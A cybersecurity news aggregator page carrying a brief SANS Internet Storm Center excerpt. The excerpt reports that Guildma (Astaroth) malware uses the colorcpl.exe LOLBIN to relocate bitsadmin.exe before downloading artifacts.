Welcome to our

Cyber Security News Aggregator

Cyber Tzar

provide a

cyber security risk management

platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.

First slide label

Some representative placeholder content for the first slide.

Second slide label

Some representative placeholder content for the second slide.

Third slide label

Some representative placeholder content for the third slide.

Guildma is now abusing colorcpl.exe LOLBIN, (Fri, May 5th)

published on 2023-05-05 17:00:59 UTC by
Content:

While analyzing a Guildma (AKA Astaroth) sample recently uploaded to MalwareBazaar [1], we came across a chain of LOLBIN abuse. It is not uncommon to see malicious code using the LOLBIN ‘bitsadmin.exe’ to download artifacts from the Internet. However, what is interesting in this case is that Guildma first copies ‘bitsadmin.exe’ to a less suspect path using ‘colorcpl.exe’, another LOLBIN, before executing it.

Article: Guildma is now abusing colorcpl.exe LOLBIN, (Fri, May 5th) - published over 1 year ago.

https://isc.sans.edu/diary/rss/29814
Published: 2023 05 05 17:00:59
Received: 2023 05 05 17:34:40
Feed: SANS Internet Storm Center, InfoCON: green
Source: SANS Internet Storm Center, InfoCON: green
Category: Alerts
Topic: Vulnerabilities
Views: 0